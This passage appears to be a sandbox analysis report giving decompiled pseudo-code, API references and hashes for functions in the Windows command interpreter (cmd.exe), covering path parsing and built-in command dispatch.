				intOrPtr _v1112;
				signed int _v1116;
				intOrPtr* _v1120;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				int _t75;
				long _t78;
				signed short* _t81;
				signed short _t90;
				intOrPtr* _t91;
				short* _t96;
				char* _t97;
				intOrPtr _t100;
				intOrPtr _t103;
				wchar_t* _t104;
				long _t107;
				signed int _t108;
				signed char _t120;
				long _t121;
				wchar_t* _t126;
				int _t127;
				void* _t129;
				wchar_t* _t130;
				signed short* _t141;
				wchar_t* _t158;
				wchar_t* _t163;
				signed int _t167;
				signed int _t171;
				long _t175;
				void* _t176;
				signed int _t179;
				void* _t180;
				void* _t184;
				void* _t186;
				signed int _t187;
				int _t188;
				signed int _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				signed int _t193;
				void* _t194;
				void* _t196;
				signed int _t197;
				void* _t199;
				void* _t200;

				_push(0xfffffffe);
				_push(0x1dbd98);
				_push(E001C7290);
				_push( *[fs:0x0]);
				_t200 = _t199 - 0x450;
				_t70 =  *0x1dd0b4; // 0xea614d48
				_v12 = _v12 ^ _t70;
				_t71 = _t70 ^ _t197;
				_v32 = _t71;
				_push(__ebx);
				_push(_t71);
				 *[fs:0x0] =  &_v20;
				_t175 = __ecx;
				_v1108 = __ecx;
				_v1112 = 0;
				GetConsoleTitleW( &_v564, 0x104);
				if( *(_t175 + 0x38) == 0) {
					L88:
					_t75 = 1;
					goto L44;
				} else {
					E001C0D51( &_v1100);
					if(_v576 == 0) {
						_t78 = 0x104;
					} else {
						_t78 = 0x7fe7;
					}
					if(E001C0C70( &_v1100, _t78) < 0) {
						L87:
						E001C0DE8(_t79,  &_v1100);
						goto L88;
					} else {
						_t81 =  *(_t175 + 0x38);
						if(_t81[1] == 0x3a) {
							_t140 =  *_t81;
							if(E001C29BB( *_t81) == 0) {
								_push(0);
								_push(0xf);
								goto L83;
							} else {
								_t140 =  *( *(_t175 + 0x38));
								if(E001C6A96( *( *(_t175 + 0x38))) != 0) {
									_push(0);
									_push(GetLastError());
									L83:
									_t79 = E001BC5A2(_t140);
									goto L86;
								} else {
									_t187 = towupper( *( *(_t175 + 0x38)) & 0x0000ffff) - 0x00000040 & 0x0000ffff;
									_t141 =  *(_t175 + 0x38);
									_t55 =  &(_t141[1]); // 0x2
									_t169 = _t55;
									do {
										_t90 =  *_t141;
										_t141 =  &(_t141[1]);
									} while (_t90 != 0);
									if(_t141 - _t169 >> 1 == 2) {
										_t91 = E001D93E2(_t187, _t169);
										goto L90;
									} else {
										goto L65;
									}
								}
							}
							goto L44;
						} else {
							_t169 =  &_v1104;
							_t189 = E001BE040(_t175,  &_v1104);
							_v1116 = _t189;
							if(_t189 == 0xffffffff) {
								L65:
								_t188 = E001BC7AA(_t175);
								goto L43;
							} else {
								if(_t189 == 0xfffffffe) {
									goto L87;
								} else {
									_t91 =  *((intOrPtr*)(0x1b1624 + (_t189 + _t189 * 2) * 8));
									_v1120 = _t91;
									if(_t91 == 0) {
										L90:
										E001C0DE8(_t91,  &_v1100);
										_t75 = 0;
										goto L44;
									} else {
										_t96 = _v580;
										if(_t96 == 0) {
											_t96 =  &_v1100;
										}
										 *_t96 = 0x2f;
										_t97 = _v580;
										if(_t97 == 0) {
											_t97 =  &_v1100;
										}
										 *((short*)(_t97 + 2)) = 0;
										if(_v580 == 0) {
											_t169 =  &_v1100;
										}
										_t130 = E001BEA40( *((intOrPtr*)(_t175 + 0x3c)), _t169, 2);
										if(_t189 == 0xa) {
											if(_t130 == 0) {
												goto L12;
											} else {
												_t127 = wcsncmp(_t130, "/", 4);
												_t200 = _t200 + 0xc;
												if(_t127 != 0) {
													goto L14;
												} else {
													goto L12;
												}
											}
										} else {
											L12:
											if(_t189 == 0x1f) {
												L14:
												if(_t130 == 0) {
													L34:
													if(E001BE340(_t175) != 0) {
														E001C100C(_t99, _t99);
													}
													_v8 = 0;
													_t190 = _v1120;
													_push(_t175);
													if(_t190 == E001B5F50) {
														_t100 = E001B5F50();
													} else {
														if(_t190 == E001B6980) {
															_t100 = E001B6980();
														} else {
															if(_t190 == E001C2360) {
																_t100 = E001C2360();
															} else {
																if(_t190 != E001B9410) {
																	if(_t190 == E001C51B0) {
																		_t100 = E001C51B0();
																	} else {
																		 *0x1f94b4();
																		_t100 =  *_t190();
																	}
																} else {
																	_t100 = E001B9410();
																}
															}
														}
													}
													_t188 = _t100;
													_v1112 = _t188;
													_v8 = 0xfffffffe;
													_t93 = E001C0BDF(_t100);
													L43:
													E001C0DE8(_t93,  &_v1100);
													_t75 = _t188;
													L44:
													 *[fs:0x0] = _v20;
													_pop(_t176);
													_pop(_t186);
													_pop(_t129);
													return E001C6FD0(_t75, _t129, _v32 ^ _t197, _t169, _t176, _t186);
												} else {
													while( *_t130 != 0) {
														do {
															_t103 =  *_t191;
															_t191 = _t191 + 2;
														} while (_t103 != 0);
														_t193 = _t191 - _t155 >> 1;
														_t104 = wcschr(_t130, 0x22);
														_t200 = _t200 + 8;
														if(_t104 != 0) {
															memset(0x1f3f10, 0, 0x1000 << 2);
															_t200 = _t200 + 0xc;
															_t158 = _t130;
															_t46 =  &(_t158[0]); // 0x2
															_t171 = _t46;
															do {
																_t107 =  *_t158;
																_t158 =  &(_t158[0]);
															} while (_t107 != 0);
															_t155 = _t158 - _t171 >> 1;
															_t179 = 0;
															_t108 = 0;
															if(_t155 > 0) {
																do {
																	_t171 =  *(_t130 + _t108 * 2) & 0x0000ffff;
																	if(_t171 != 0x22) {
																		 *(0x1f3f10 + _t179 * 2) = _t171;
																		_t179 = _t179 + 1;
																	}
																	_t108 = _t108 + 1;
																} while (_t108 < _t155);
															}
															_t180 = _t179 + _t179;
															if(_t180 >= 0x4000) {
																E001C711D(_t108, _t130, _t155, _t171, _t180, _t193);
																_push(_t197);
																_push(_t193);
																_push(_t180);
																_t194 = E001C0C70(0x1f3ab0, ((0 |  *0x1f3cbc != 0x00000000) - 0x00000001 & 0xffff811d) + 0x7fe7);
																if(_t194 < 0) {
																	_push(_t194);
																	_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
																	_push(0x36);
																	goto L101;
																} else {
																	_t162 =  *0x1f3cb8;
																	if( *0x1f3cb8 == 0) {
																		_t162 = 0x1f3ab0;
																	}
																	_t194 = E001C6826(_t162,  *0x1f3cc0, _v0, _a4);
																	if(_t194 < 0) {
																		_push(_t194);
																		_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
																		_push(0x37);
																		L101:
																		E001D292C();
																	}
																}
																return _t194;
															} else {
																 *((short*)(_t180 + 0x1f3f10)) = 0;
																_t169 = 0x1f3f10;
																goto L20;
															}
														} else {
															_t169 = _t130;
															L20:
															_t196 = _t193 + 1;
															if(_t196 == 0 || _t196 > 0x7fffffff) {
																if(_t196 != 0) {
																	 *_t130 = 0;
																}
															} else {
																_t126 = _t130;
																_t184 = 0x7ffffffe - _t196;
																_t169 = _t169 - _t130;
																while(_t184 + _t196 != 0) {
																	_t167 =  *(_t169 + _t126) & 0x0000ffff;
																	if(_t167 != 0) {
																		 *_t126 = _t167;
																		_t126 =  &(_t126[0]);
																		_t196 = _t196 - 1;
																		if(_t196 != 0) {
																			continue;
																		}
																	}
																	break;
																}
																if(_t196 == 0) {
																	_t126 = _t126 - 2;
																}
																_t155 = 0;
																 *_t126 = 0;
															}
															_t120 = _v1104;
															if((_t120 & 0x00000001) != 0) {
																if(_t130[0] != 0x3a) {
																	goto L29;
																} else {
																	_t155 =  *_t130;
																	if(E001C29BB( *_t130) == 0) {
																		_push(0);
																		_push(0xf);
																		goto L85;
																	} else {
																		if(_v1116 == 4) {
																			L71:
																			_t120 = _v1104;
																			goto L29;
																		} else {
																			_t155 =  *_t130;
																			if(E001C6A96( *_t130) != 0) {
																				_push(0);
																				_push(GetLastError());
																				goto L85;
																			} else {
																				goto L71;
																			}
																		}
																	}
																}
															} else {
																L29:
																if((_t120 & 0x00000002) != 0) {
																	if( *_t130 != 0x2f) {
																		goto L30;
																	} else {
																		_push(0);
																		_push(0x232a);
																		L85:
																		_t79 = E001BC5A2(_t155);
																		 *0x1eb8b0 = 1;
																		L86:
																		goto L87;
																	}
																} else {
																	L30:
																	_t163 = _t130;
																	_t34 =  &(_t163[0]); // 0x2
																	_t169 = _t34;
																	do {
																		_t121 =  *_t163;
																		_t163 =  &(_t163[0]);
																	} while (_t121 != 0);
																	_t130 = _t130 + (_t163 - _t169 >> 1) * 2 + 2;
																	if(_t130 != 0) {
																		continue;
																	} else {
																		break;
																	}
																}
															}
														}
														goto L102;
													}
													_t175 = _v1108;
													goto L34;
												}
											} else {
												_t169 = _t130;
												if(E001BDD2C(_t189, _t130, 1) != 0) {
													goto L87;
												} else {
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L102:
			}

0x001c07c5
0x001c07c7
0x001c07cc
0x001c07d7
0x001c07d8
0x001c07de
0x001c07e3
0x001c07e6
0x001c07e8
0x001c07eb
0x001c07ee
0x001c07f2
0x001c07f8
0x001c07fa
0x001c0800
0x001c0816
0x001c0820
0x001ccc7e
0x001ccc7e
0x00000000
0x001c0826
0x001c082c
0x001c0838
0x001ccc3d
0x001c083e
0x001c083e
0x001c083e
0x001c0851
0x001ccc73
0x001ccc79
0x00000000
0x001c0857
0x001c0857
0x001c085f
0x001c0b1a
0x001c0b24
0x001ccc47
0x001ccc49
0x00000000
0x001c0b2a
0x001c0b2d
0x001c0b37
0x001ccc4d
0x001ccc55
0x001ccc56
0x001ccc56
0x00000000
0x001c0b3d
0x001c0b51
0x001c0b54
0x001c0b57
0x001c0b57
0x001c0b60
0x001c0b60
0x001c0b63
0x001c0b66
0x001c0b72
0x001ccc8a
0x00000000
0x00000000
0x00000000
0x00000000
0x001c0b72
0x001c0b37
0x00000000
0x001c0865
0x001c0865
0x001c0872
0x001c0874
0x001c087d
0x001c0b78
0x001c0b7f
0x00000000
0x001c0883
0x001c0886
0x00000000
0x001c088c
0x001c088f
0x001c0896
0x001c089e
0x001ccc8f
0x001ccc95
0x001ccc9a
0x00000000
0x001c08a4
0x001c08a4
0x001c08ac
0x001ccca1
0x001ccca1
0x001c08b7
0x001c08ba
0x001c08c2
0x001cccac
0x001cccac
0x001c08ca
0x001c08d6
0x001cccb7
0x001cccb7
0x001c08e6
0x001c08eb
0x001c0a68
0x00000000
0x001c0a6e
0x001c0a76
0x001c0a7c
0x001c0a81
0x00000000
0x001c0a87
0x00000000
0x001c0a87
0x001c0a81
0x001c08f1
0x001c08f1
0x001c08f4
0x001c0909
0x001c090b
0x001c09d1
0x001c09da
0x001c09de
0x001c09de
0x001c09e3
0x001c09ea
0x001c09f0
0x001c09f7
0x001c0a24
0x001c09f9
0x001c09ff
0x001c0aef
0x001c0a05
0x001c0a0b
0x001c0af9
0x001c0a11
0x001c0a17
0x001c0b09
0x001c0b86
0x001c0b0b
0x001c0b0d
0x001c0b13
0x001c0b13
0x001c0a1d
0x001c0a1d
0x001c0a1d
0x001c0a17
0x001c0a0b
0x001c09ff
0x001c0a29
0x001c0a2b
0x001c0a31
0x001c0a38
0x001c0a3d
0x001c0a43
0x001c0a48
0x001c0a4a
0x001c0a4d
0x001c0a55
0x001c0a56
0x001c0a57
0x001c0a65
0x001c0911
0x001c0911
0x001c0920
0x001c0920
0x001c0923
0x001c0926
0x001c092d
0x001c0932
0x001c0938
0x001c093d
0x001c0a98
0x001c0a98
0x001c0a9a
0x001c0a9c
0x001c0a9c
0x001c0aa0
0x001c0aa0
0x001c0aa3
0x001c0aa6
0x001c0aad
0x001c0aaf
0x001c0ab1
0x001c0ab5
0x001c0ab7
0x001c0ab7
0x001c0abe
0x001c0ac0
0x001c0ac8
0x001c0ac8
0x001c0ac9
0x001c0aca
0x001c0ab7
0x001c0ace
0x001c0ad6
0x001c0bf7
0x001c0bfe
0x001c0c09
0x001c0c0e
0x001c0c26
0x001c0c2a
0x001ccd24
0x001ccd25
0x001ccd2a
0x00000000
0x001c0c30
0x001c0c30
0x001c0c38
0x001c0c5d
0x001c0c5d
0x001c0c4b
0x001c0c4f
0x001ccd2e
0x001ccd2f
0x001ccd34
0x001ccd36
0x001ccd3a
0x001ccd3a
0x001c0c4f
0x001c0c5a
0x001c0adc
0x001c0ade
0x001c0ae5
0x00000000
0x001c0ae5
0x001c0943
0x001c0943
0x001c0945
0x001c0945
0x001c0948
0x001ccccc
0x001cccd4
0x001cccd4
0x001c095a
0x001c095a
0x001c0961
0x001c0963
0x001c0965
0x001c096c
0x001c0973
0x001c0975
0x001c0978
0x001c097b
0x001c097e
0x00000000
0x00000000
0x001c097e
0x00000000
0x001c0973
0x001c0982
0x001cccc2
0x001cccc2
0x001c0988
0x001c098a
0x001c098a
0x001c098d
0x001c0996
0x001c0b95
0x00000000
0x001c0b9b
0x001c0b9b
0x001c0ba5
0x001ccc5d
0x001ccc5f
0x00000000
0x001c0bab
0x001c0bb2
0x001c0bc4
0x001c0bc4
0x00000000
0x001c0bb4
0x001c0bb4
0x001c0bbe
0x001cccdc
0x001ccce4
0x00000000
0x00000000
0x00000000
0x00000000
0x001c0bbe
0x001c0bb2
0x001c0ba5
0x001c099c
0x001c099c
0x001c099e
0x001c0bd4
0x00000000
0x001c0bda
0x001cccea
0x001cccec
0x001ccc61
0x001ccc61
0x001ccc66
0x001ccc70
0x00000000
0x001ccc70
0x001c09a4
0x001c09a4
0x001c09a4
0x001c09a6
0x001c09a6
0x001c09b0
0x001c09b0
0x001c09b3
0x001c09b6
0x001c09c2
0x001c09c5
0x00000000
0x00000000
0x00000000
0x00000000
0x001c09c5
0x001c099e
0x001c0996
0x00000000
0x001c093d
0x001c09cb
0x00000000
0x001c09cb
0x001c08f6
0x001c08f8
0x001c0903
0x00000000
0x00000000
0x00000000
0x00000000
0x001c0903
0x001c08f4
0x001c08eb
0x001c089e
0x001c0886
0x001c087d
0x001c085f
0x001c0851
0x00000000

APIs

GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,EA614D48,00000001,?), ref: 001C0816

Part of subcall function 001C0D51: memset.MSVCRT ref: 001C0D7D

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

towupper.MSVCRT ref: 001C0B44

Part of subcall function 001BE040: memset.MSVCRT ref: 001BE090
Part of subcall function 001BE040: wcschr.MSVCRT ref: 001BE0F3
Part of subcall function 001BE040: wcschr.MSVCRT ref: 001BE10B
Part of subcall function 001BE040: _wcsicmp.MSVCRT ref: 001BE179

wcschr.MSVCRT ref: 001C0932
wcsncmp.MSVCRT(00000000,001B218C,00000004,00000002,00007FE7), ref: 001C0A76

Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEAB7
Part of subcall function 001BEA40: iswspace.MSVCRT ref: 001BEB2D
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB49
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB6D

Part of subcall function 001B6980: _get_osfhandle.MSVCRT ref: 001B6A06
Part of subcall function 001B6980: GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B6A10
Part of subcall function 001B6980: _wcsnicmp.MSVCRT ref: 001B6A3D
Part of subcall function 001B6980: _get_osfhandle.MSVCRT ref: 001B6A64
Part of subcall function 001B6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B6A6E
Part of subcall function 001B6980: _get_osfhandle.MSVCRT ref: 001B6A8E
Part of subcall function 001B6980: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B6AA0
Part of subcall function 001B6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 001B6AC0
Part of subcall function 001B6980: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20), ref: 001B6AD1
Part of subcall function 001B6980: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001DD620,00000200,00000000,00000000), ref: 001B6AE7
Part of subcall function 001B6980: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20), ref: 001B6AF4

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001CCCDE

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: wcschr$File$_get_osfhandlememset$LockPointerShared$AcquireConsoleErrorLastReadReleaseSizeTitleType_wcsicmp_wcsnicmpiswspacetowupperwcsncmp
String ID:
API String ID: 1803274588-0
Opcode ID: 64efff143a8e2f9379528febc31f7eca5126c26218abff05bc4c26db6f1d3837
Instruction ID: 1f8a185facfd4b4bb76f7d22183d251e319bdeb478c6e7aab5046c45c056ce15
Opcode Fuzzy Hash: 64efff143a8e2f9379528febc31f7eca5126c26218abff05bc4c26db6f1d3837
Instruction Fuzzy Hash: 18C16831A00215CBDB29AB68CC95FBE7370AF78304F05456CE90EAB691EB70DD81CB95

Uniqueness

Uniqueness Score: -1.00%

Function 001C4800 Relevance: 9.3, APIs: 6, Instructions: 327
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E001C4800(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				int _v28;
				char _v32;
				void* _v36;
				void _v556;
				int _v564;
				char _v568;
				void* _v572;
				void _v1092;
				char _v1093;
				signed int _v1094;
				signed int* _v1100;
				signed int _v1104;
				signed int* _v1108;
				intOrPtr _v1112;
				signed int _v1116;
				intOrPtr _v1120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t106;
				intOrPtr _t123;
				intOrPtr _t127;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				void* _t136;
				signed int _t137;
				intOrPtr _t138;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				intOrPtr* _t146;
				intOrPtr _t147;
				void* _t148;
				signed int _t153;
				signed int _t154;
				void* _t163;
				intOrPtr* _t164;
				intOrPtr* _t167;
				intOrPtr* _t170;
				signed int _t176;
				signed int* _t177;
				void* _t178;
				intOrPtr* _t186;
				void* _t190;
				signed int _t192;
				signed int _t196;
				void* _t198;
				intOrPtr* _t200;
				void* _t201;
				void* _t202;
				intOrPtr _t203;
				intOrPtr* _t204;
				signed int* _t205;
				signed int _t206;
				signed int _t211;

				_t191 = __edx;
				_t154 = _t211;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t154 + 4));
				_t209 = (_t211 & 0xfffffff8) + 4;
				_t106 =  *0x1dd0b4; // 0xea614d48
				_v16 = _t106 ^ (_t211 & 0xfffffff8) + 0x00000004;
				_t200 =  *((intOrPtr*)(_t154 + 0xc));
				_t196 = 0;
				_v564 = 0x104;
				_v1093 = __edx;
				_v1116 = __ecx;
				 *0x1f3cf0 = 0;
				_v572 = 0;
				_v568 = 1;
				memset( &_v1092, 0, 0x104);
				_v36 = 0;
				_v32 = 1;
				_v28 = 0x104;
				memset( &_v556, 0, 0x104);
				_t156 =  &_v1092;
				if(E001C0C70( &_v1092, 0x7fe9) < 0) {
					L74:
					if(_v1093 == 0) {
						L14:
						_t196 = 1;
						L15:
						__imp__??_V@YAXPAX@Z(_v36);
						__imp__??_V@YAXPAX@Z(_v572);
						_pop(_t198);
						_pop(_t201);
						return E001C6FD0(_t196, _t154, _v16 ^ _t209, _t191, _t198, _t201);
					}
					_push(_t196);
					_push(0x2374);
					L13:
					E001BC5A2(_t156);
					goto L14;
				}
				_t156 =  &_v556;
				if(E001C0C70( &_v556, 0x7fe9) < 0) {
					goto L74;
				}
				_t163 = 0x30;
				_t164 = E001C00B0(_t163);
				_v1108 = _t164;
				if(_t164 == 0) {
					L47:
					E001D9287(_t164);
					__imp__longjmp(0x1eb8b8, 1);
					L48:
					_t165 = 0x1f3ab0;
					L17:
					E001C0D89(_t191, _t165);
					E001C5D39();
					_t202 = _v572;
					_t167 = _t202;
					if(_t202 == 0) {
						_t167 =  &_v1092;
					}
					_t191 = _t167 + 2;
					do {
						_t123 =  *_t167;
						_t167 = _t167 + 2;
					} while (_t123 != _t196);
					_t156 = _t167 - _t191 >> 1;
					_v1104 = _t156;
					if(_t156 <= 3) {
						L24:
						if(_t156 + 1 > 0x7fe7) {
							if(_v1093 == 0) {
								goto L14;
							}
							_push(_t196);
							_push(2);
							goto L13;
						}
						_t203 = _v1120;
						_t125 =  *(_t203 + 0x10);
						if( *( *(_t203 + 0x10)) == _t196) {
							_t125 = "*";
						}
						E001C0D89(_t191, _t125);
						_t170 = _v36;
						if(_t170 == 0) {
							_t170 =  &_v556;
						}
						_t191 = _t170 + 2;
						do {
							_t127 =  *_t170;
							_t170 = _t170 + 2;
						} while (_t127 != _t196);
						_t156 = _t170 - _t191 >> 1;
						if(_v1104 + 1 + (_t170 - _t191 >> 1) > 0x7fe7) {
							if(_v1093 == 0) {
								goto L14;
							}
							_push(_t196);
							_push(0x6f);
							goto L13;
						}
						if( *( *(_t203 + 0x10)) == _t196) {
							L33:
							_t172 = _v36;
							if(_v36 == 0) {
								_t172 =  &_v556;
							}
							_t132 = E001C297B(_t172);
							_t204 = _v1100;
							 *_t204 = _t132;
							_t173 = _v572;
							if(_v572 == 0) {
								_t173 =  &_v1092;
							}
							_t133 = E001C297B(_t173);
							 *((intOrPtr*)(_t204 + 4)) = _t133;
							_t205 = _v1108;
							if(_t205[1] != _t196) {
								__imp___wcsicmp(_t205[1], _t133);
								if(_t133 == 0) {
									_t205[2] = _t205[2] + 1;
									_t176 = _v1100;
									goto L38;
								}
								_t164 = 0x30;
								_t205 = E001C00B0(_t164);
								if(_t205 == 0) {
									goto L47;
								}
								_v1108 = _t205;
								 *_v1108 = _t205;
								_t143 = E001C297B(_v1100[1]);
								_t176 = _v1100;
								_t205[1] = _t143;
								 *_t205 = _t196;
								_t144 =  *((intOrPtr*)(_t176 + 8));
								_t205[2] = 1;
								goto L37;
							} else {
								_t145 = E001C297B(_t133);
								_t176 = _v1100;
								_t205[1] = _t145;
								_t144 =  *((intOrPtr*)(_t176 + 8));
								L37:
								_t205[3] = _t176;
								_t205[4] = _t144;
								L38:
								_t191 = _v1116;
								_t135 = _v1112 + 1;
								_t177 =  *(_t176 + 0xc);
								_v1112 = _t135;
								_v1100 = _t177;
								if(_t135 >  *((intOrPtr*)(_v1116 + 0x48))) {
									goto L15;
								}
								L4:
								_t206 =  *_t177;
								_t192 = _t206;
								_v1104 = _t206;
								_t178 = _t192 + 2;
								do {
									_t136 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t136 != _t196);
								_t191 = _t192 - _t178 >> 1;
								_t137 = E001C3121(_t206, _t192 - _t178 >> 1);
								_v1094 = _t137;
								if(_t137 != 0) {
									L8:
									_v1100[2] = _t137;
									if( *((char*)(_t154 + 8)) != 0) {
										_t191 = _t137;
										_t206 = E001C4DB8(_t206, _t137);
										E001C0040(_v1104);
									}
									_t156 = _t206;
									 *0x1f3cf0 = _t196;
									_t138 = E001C3B5D(_t206, _t191);
									_v1120 = _t138;
									if(_t138 != 1) {
										_t165 =  *0x1f3cb8;
										if( *0x1f3cb8 == 0) {
											goto L48;
										}
										goto L17;
									} else {
										if(_v1093 == 0) {
											goto L14;
										}
										_push(_t196);
										_push( *0x1f3cf0);
										goto L13;
									}
								}
								_t156 =  *0x1f3cf0;
								if(_t156 != 0) {
									if(_v1093 == 0) {
										goto L14;
									}
									_push(_t196);
									_push(_t156);
									goto L13;
								}
								goto L8;
							}
						}
						_t146 =  *((intOrPtr*)(_t203 + 0x14));
						if(_t146 == 0 ||  *_t146 == _t196) {
							_t186 = _v36;
							if(_t186 == 0) {
								_t186 =  &_v556;
							}
							_t191 = _t186 + 2;
							do {
								_t147 =  *_t186;
								_t186 = _t186 + 2;
							} while (_t147 != _t196);
							_t148 = (_t186 - _t191 >> 1) + 3;
							if(_v1094 != 0) {
								if(_t148 <= 0x7fe7 &&  *((char*)(_t154 + 8)) != 0) {
									E001C0CF2(_t191, L".*");
								}
							}
						}
						goto L33;
					}
					if(_v1094 != 0) {
						_t190 = _t202;
						if(_t202 == 0) {
							_t190 =  &_v1092;
						}
						if( *((short*)(E001B5846(_t190))) != 0x2e) {
							_t156 = _v1104;
							goto L22;
						} else {
							if(_t202 == 0) {
								_t202 =  &_v1092;
							}
							_t156 = _v1104;
							 *((short*)(_t202 + _t156 * 2 - 4)) = 0;
							goto L24;
						}
					}
					L22:
					if(_t202 == 0) {
						_t202 =  &_v1092;
					}
					 *((short*)(_t202 + _t156 * 2 - 2)) = 0;
					goto L24;
				}
				_t153 = _v1116;
				 *_t200 = _t164;
				_t191 = 1;
				 *_t164 = 0;
				 *((intOrPtr*)(_t164 + 4)) = 0;
				 *((intOrPtr*)(_t164 + 8)) = 1;
				_t177 = _t153 + 0x4c;
				_v1112 = 1;
				_v1100 = _t177;
				if( *((intOrPtr*)(_t153 + 0x48)) < 1) {
					goto L15;
				}
				goto L4;
			}

0x001c4800
0x001c4803
0x001c4805
0x001c4806
0x001c4811
0x001c4815
0x001c481d
0x001c4824
0x001c4828
0x001c4832
0x001c4834
0x001c4840
0x001c4848
0x001c484e
0x001c4854
0x001c485a
0x001c4861
0x001c4869
0x001c4871
0x001c4875
0x001c4881
0x001c4889
0x001c489b
0x001cea9e
0x001ceaa5
0x001c498b
0x001c498d
0x001c498e
0x001c4991
0x001c499e
0x001c49aa
0x001c49ad
0x001c49b9
0x001c49b9
0x001ceaab
0x001ceaac
0x001c4984
0x001c4984
0x00000000
0x001c498a
0x001c48a6
0x001c48b3
0x00000000
0x00000000
0x001c48bb
0x001c48c1
0x001c48c3
0x001c48cb
0x001ce940
0x001ce940
0x001ce94c
0x001ce952
0x001ce952
0x001c49ca
0x001c49d1
0x001c49d6
0x001c49db
0x001c49e1
0x001c49e5
0x001ce95c
0x001ce95c
0x001c49eb
0x001c49ee
0x001c49ee
0x001c49f1
0x001c49f4
0x001c49fb
0x001c49fd
0x001c4a06
0x001c4a24
0x001c4a2c
0x001cea90
0x00000000
0x00000000
0x001cea96
0x001cea97
0x00000000
0x001cea97
0x001c4a32
0x001c4a38
0x001c4a3e
0x001ce9b0
0x001ce9b0
0x001c4a4b
0x001c4a50
0x001c4a55
0x001ce9ba
0x001ce9ba
0x001c4a5b
0x001c4a5e
0x001c4a5e
0x001c4a61
0x001c4a64
0x001c4a71
0x001c4a7b
0x001cea7b
0x00000000
0x00000000
0x001cea81
0x001cea82
0x00000000
0x001cea82
0x001c4a87
0x001c4a9d
0x001c4a9d
0x001c4aa2
0x001ce9ef
0x001ce9ef
0x001c4aa8
0x001c4aad
0x001c4ab3
0x001c4ab5
0x001c4abd
0x001c4b53
0x001c4b53
0x001c4ac3
0x001c4ac8
0x001c4acb
0x001c4ad4
0x001ce9fe
0x001cea08
0x001cea52
0x001cea55
0x00000000
0x001cea55
0x001cea0c
0x001cea12
0x001cea16
0x00000000
0x00000000
0x001cea28
0x001cea2e
0x001cea33
0x001cea38
0x001cea3e
0x001cea41
0x001cea43
0x001cea46
0x00000000
0x001c4ada
0x001c4adc
0x001c4ae1
0x001c4ae7
0x001c4aea
0x001c4aed
0x001c4aed
0x001c4af0
0x001c4af3
0x001c4af9
0x001c4aff
0x001c4b00
0x001c4b03
0x001c4b09
0x001c4b12
0x00000000
0x00000000
0x001c48fc
0x001c48fc
0x001c48fe
0x001c4900
0x001c4906
0x001c4909
0x001c4909
0x001c490c
0x001c490f
0x001c4918
0x001c491a
0x001c491f
0x001c4927
0x001c4937
0x001c4941
0x001c4944
0x001c4946
0x001c4955
0x001c4957
0x001c4957
0x001c495c
0x001c495e
0x001c4964
0x001c4969
0x001c4972
0x001c49bc
0x001c49c4
0x00000000
0x00000000
0x00000000
0x001c4974
0x001c497b
0x00000000
0x00000000
0x001c497d
0x001c497e
0x00000000
0x001c497e
0x001c4972
0x001c4929
0x001c4931
0x001cea67
0x00000000
0x00000000
0x001cea6d
0x001cea6e
0x00000000
0x001cea6e
0x00000000
0x001c4931
0x001c4ad4
0x001c4a89
0x001c4a8e
0x001c4b1d
0x001c4b22
0x001c4b4b
0x001c4b4b
0x001c4b24
0x001c4b27
0x001c4b27
0x001c4b2a
0x001c4b2d
0x001c4b3d
0x001c4b40
0x001ce9ca
0x001ce9e5
0x001ce9e5
0x001ce9ca
0x001c4b40
0x00000000
0x001c4a8e
0x001c4a0f
0x001ce967
0x001ce96b
0x001ce96d
0x001ce96d
0x001ce97c
0x001ce99a
0x00000000
0x001ce97e
0x001ce980
0x001ce982
0x001ce982
0x001ce988
0x001ce990
0x00000000
0x001ce990
0x001ce97c
0x001c4a15
0x001c4a17
0x001ce9a5
0x001ce9a5
0x001c4a1f
0x00000000
0x001c4a1f
0x001c48d1
0x001c48d9
0x001c48db
0x001c48dc
0x001c48de
0x001c48e1
0x001c48e4
0x001c48e7
0x001c48ed
0x001c48f6
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 001C4861
memset.MSVCRT ref: 001C4881

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

